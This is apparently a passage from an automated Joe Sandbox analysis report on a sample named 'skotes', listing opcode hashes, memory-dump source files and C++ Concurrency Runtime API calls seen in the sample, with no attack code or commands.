                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72218EFB24C2107E71029A952B189FAAB7DE5C3A34331C47AF442DB506F7D55E1E6131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9f34b839812da251e21783b384128e43fcde1c7cf82c68bfec2f60aa84d25736
                                                                                                                                                                                                                                                                • Instruction ID: 1780eefc54156d05b071e86778946806aa098b598385b54a8d9a59a54e54ff45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f34b839812da251e21783b384128e43fcde1c7cf82c68bfec2f60aa84d25736
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C118EFB24C2107EB10289952B549F66B7DE5C2730331C47AF403DB602E3DA4A1D6131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b1a21c02ca04bad641a5dc3ce1ccf367427939449b38374159c1239fb45f9b86
                                                                                                                                                                                                                                                                • Instruction ID: d4e2c657cf41969ee7595f0a77893e6036438f731eadf7e4778537749a075a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1a21c02ca04bad641a5dc3ce1ccf367427939449b38374159c1239fb45f9b86
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40014CFB24D2007EB10289926B28AF7A7BDE6D2B30731C476F442D3502E7D54A0E6131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 21a8c7cf9996bbb438c24eeb9e17c35a6a133f65763b658b4e8247db49c06b98
                                                                                                                                                                                                                                                                • Instruction ID: a73997e8d6ef9e8546129746f80332df78ac335fa6e6b8936bac5dad0d98c889
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21a8c7cf9996bbb438c24eeb9e17c35a6a133f65763b658b4e8247db49c06b98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 590104FB24C210BE710289962B289F7AB7DE5C2A30331C47AF503D7606E7D95A1D6131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 7243a1b80b20401e5937ca73dc30c7b7d68b0b9e66841d7b2c5778688025a639
                                                                                                                                                                                                                                                                • Instruction ID: bc66f9658415f1ed2c88b6a9bd56ab609c41125493fcfc99db1f34d942c85e03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7243a1b80b20401e5937ca73dc30c7b7d68b0b9e66841d7b2c5778688025a639
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F0C9FB24C1107D710285962B289F76BBDE4D6B31331C87BF442D6506E3DA0B5E6131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a0de98840d44aa74b06c1a5faaafe285a40d29f342008bb945797349aab8577e
                                                                                                                                                                                                                                                                • Instruction ID: 94c09cde364a40b34ac282eaea6db98bd881e570d39ca2ace679395ef2681087
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0de98840d44aa74b06c1a5faaafe285a40d29f342008bb945797349aab8577e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F059FB24C1213D711194963F64AFB576EE4D2A70371C47BF442D2946E7894A5E6031
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AC0F16
                                                                                                                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AC0F62
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00AC2750
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00AC0FCE
                                                                                                                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AC0FEA
                                                                                                                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AC103E
                                                                                                                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AC106B
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00AC10C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 0f318cf3b392fd7a5937bd02140868684ba29fb28a40b1e4a0c2806efcd4b5d0
                                                                                                                                                                                                                                                                • Instruction ID: e020124ba139ca6dc35e648adb8e4bb7876253956e9a4b6348e43299c2ddd5b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f318cf3b392fd7a5937bd02140868684ba29fb28a40b1e4a0c2806efcd4b5d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DB15B70A00615EFDB28CF68D990F7AB7B5FF49300F16416DE905AB652D734AD81CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00AC2D0F
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00AC1614
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00AC2E39
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00AC2EA8
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00AC1746
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00AC17A6
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00AC17B2
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00AC17ED
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00AC180E
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00AC181A
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00AC1823
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00AC183B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2508902052-0
                                                                                                                                                                                                                                                                • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                                • Instruction ID: efd0aeba06ec2c336113eec1ac03a7cd87da436acef2205f5353da2bd818cb1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2815871F006259FCB19DFA9C580A6DB7F2FF49304B1646ADE445AB702C770AD52CB84
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00ACEC81
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00AC8F50
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00ACECE7
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00ACECFF
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00ACED0C
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00ACE7D7
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00ACE86F
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00ACE879
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE7AF: Concurrency::location::_Assign.LIBCMT ref: 00ACE8AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00ACE8B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
